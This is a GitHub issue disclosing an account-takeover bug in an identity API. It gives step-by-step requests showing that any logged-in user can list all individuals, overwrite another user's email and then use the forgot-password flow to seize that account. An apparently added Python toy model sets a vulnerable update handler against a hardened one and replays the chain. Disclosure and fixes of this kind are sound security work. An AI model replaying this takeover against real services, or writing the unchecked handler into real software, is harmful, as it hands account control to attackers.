Vulnerability: Individual can reset password of another individual #618

Closed
vikstrom opened this issue Feb 16, 2024 · 2 comments
Labels: bug (Something isn't working), high-priority

@vikstrom

Summary

User A is able to list all other users in the organisation by requesting GET service/individuals.
The response lists all individuals in the organisation, including email, phone and id.
Using id...

"individuals": [ {"id": {ID}, ...} ]

...it's possible to make a request to PUT service/individual and update both phone and email for any user. User A is able to update User B's email to one that User A controls.

It's then a simple matter of starting a Forgot Password flow PUT onboard/password/forgot providing that email address and using the link to reset the password. User A will now have full control over User B.

Detailed

1. Login as User A

POST onboard/individual/login

Request body:

{
  "username": "user_a@fakemail.com",
  "password": "usera"
}
2. Authenticate with the bearer token to list all individuals

GET service/individuals?offset=0&limit=10

Response:

{
    "individuals": [
        {
            "id": "65ce250da82fd094cbc922d3",
            "externalId": "",
            "externalIdType": "",
            "identityProviderId": "",
            "name": "User B",
            "iamId": "8206b93b-97a8-413a-99ba-a6c8138a849f",
            "email": "user_b@fakemail.com",
            "phone": "123456789"
        },
        {
            "id": "65ce2534a82fd094cbc922d5",
            "externalId": "",
            "externalIdType": "",
            "identityProviderId": "",
            "name": "User A",
            "iamId": "46b08a7f-43a8-4e7c-a38e-b23204e0198a",
            "email": "user_a@fakemail.com",
            "phone": "123456789"
        }
    ]
}
3. Now we are able to update User B, using the bearer token for User A.

PUT service/individual/65ce250da82fd094cbc922d3

Request body

{
  "individual": {
    "phone": "1337",
    "email": "our_email@fullcontrol.com"
  }
}

Response

{
    "individual": {
        "id": "65ce250da82fd094cbc922d3",
        "externalId": "",
        "externalIdType": "",
        "identityProviderId": "",
        "name": "User B",
        "iamId": "8206b93b-97a8-413a-99ba-a6c8138a849f",
        "email": "our_email@fullcontrol.com",
        "phone": "1337"
    }
}
4. Request a Forgot Password link.

PUT onboard/password/forgot

Request body

{
  "username": "our_email@fullcontrol.com"
}
5. Click the link sent to the email address and reset the password.

You are now able to login as User B.
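The chain above is a classic broken object-level authorization bug: the PUT handler checks that the caller holds a valid bearer token but never checks that the token belongs to the individual being modified, and because the email it overwrites is also the password-reset channel, the missing check escalates into a full account takeover. The following is an added example, not code from the project in this issue: a toy in-memory model of the three endpoints (login, update individual, forgot password) with the vulnerable authorization logic beside a hardened version, driven by the same steps the report describes. All record ids, tokens, addresses and the `outbox` stand-in for mail delivery are constructed for the example.

```python
"""Toy model of the reported takeover chain, with the missing check added.

Added example; not the project's own code.  Ids, tokens, addresses and the
in-memory "mailbox" are constructed stand-ins.
"""
import secrets
from dataclasses import dataclass


@dataclass
class Individual:
    id: str
    name: str
    email: str
    phone: str
    password: str
    is_admin: bool = False


class Store:
    def __init__(self):
        self.individuals = {}   # id -> Individual
        self.sessions = {}      # bearer token -> individual id
        self.reset_tokens = {}  # reset token -> individual id
        self.outbox = []        # (recipient email, reset token): stand-in for mail delivery


class Unauthorized(Exception):
    pass


class Forbidden(Exception):
    pass


def login(store, username, password):
    """POST onboard/individual/login: returns a bearer token."""
    for ind in store.individuals.values():
        if ind.email == username and ind.password == password:
            token = secrets.token_hex(16)
            store.sessions[token] = ind.id
            return token
    raise Unauthorized("bad credentials")


def current_individual(store, token):
    try:
        return store.individuals[store.sessions[token]]
    except KeyError:
        raise Unauthorized("missing or invalid bearer token") from None


def update_individual_vulnerable(store, token, target_id, patch):
    """PUT service/individual/{id} as reported: authenticated, but not authorised."""
    current_individual(store, token)  # any logged-in user passes this
    target = store.individuals[target_id]
    target.email = patch.get("email", target.email)
    target.phone = patch.get("phone", target.phone)
    return target


def update_individual_hardened(store, token, target_id, patch):
    """Same endpoint with object-level authorization and a protected email field."""
    caller = current_individual(store, token)
    if caller.id != target_id and not caller.is_admin:
        raise Forbidden("cannot modify another individual")
    target = store.individuals[target_id]
    if "email" in patch and patch["email"] != target.email:
        # The email is the password-reset channel; never switch it without
        # verifying the new address (out of scope for this toy model).
        raise Forbidden("email change requires verification of the new address")
    target.phone = patch.get("phone", target.phone)
    return target


def forgot_password(store, username):
    """PUT onboard/password/forgot: mails a reset token to the stored address."""
    for ind in store.individuals.values():
        if ind.email == username:
            tok = secrets.token_urlsafe(32)
            store.reset_tokens[tok] = ind.id
            store.outbox.append((ind.email, tok))
    # Same response whether or not the address exists, to avoid enumeration.


def reset_password(store, reset_token, new_password):
    ind_id = store.reset_tokens.pop(reset_token)  # single-use token
    store.individuals[ind_id].password = new_password


def seed():
    s = Store()
    s.individuals["b1"] = Individual("b1", "User B", "user_b@fakemail.com", "123456789", "userb")
    s.individuals["a1"] = Individual("a1", "User A", "user_a@fakemail.com", "123456789", "usera")
    return s


def takeover(update):
    """Run the report's steps against `update`; True if User A can log in as User B."""
    s = seed()
    tok_a = login(s, "user_a@fakemail.com", "usera")
    try:
        update(s, tok_a, "b1", {"email": "our_email@fullcontrol.com", "phone": "1337"})
    except Forbidden:
        return False
    forgot_password(s, "our_email@fullcontrol.com")
    attacker_mail = [t for addr, t in s.outbox if addr == "our_email@fullcontrol.com"]
    if not attacker_mail:
        return False
    reset_password(s, attacker_mail[0], "pwned")
    try:
        login(s, "our_email@fullcontrol.com", "pwned")  # this token now maps to User B
        return True
    except Unauthorized:
        return False
```

`takeover(update_individual_vulnerable)` reproduces the report and returns True; `takeover(update_individual_hardened)` stops at step 3 with a 403-style `Forbidden` and returns False. The hardened handler deliberately does two things rather than one: it ties the target id to the caller (or an admin), and it refuses to treat a plain PUT as a verified change of the reset address, since either gap alone would leave the chain open once the other is fixed.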
@kashishmalik

Checked the API with Albin

@georgepadayatti (Member)

> Checked the API with Albin

Have you signed-off on this change? If yes, could you make a release?
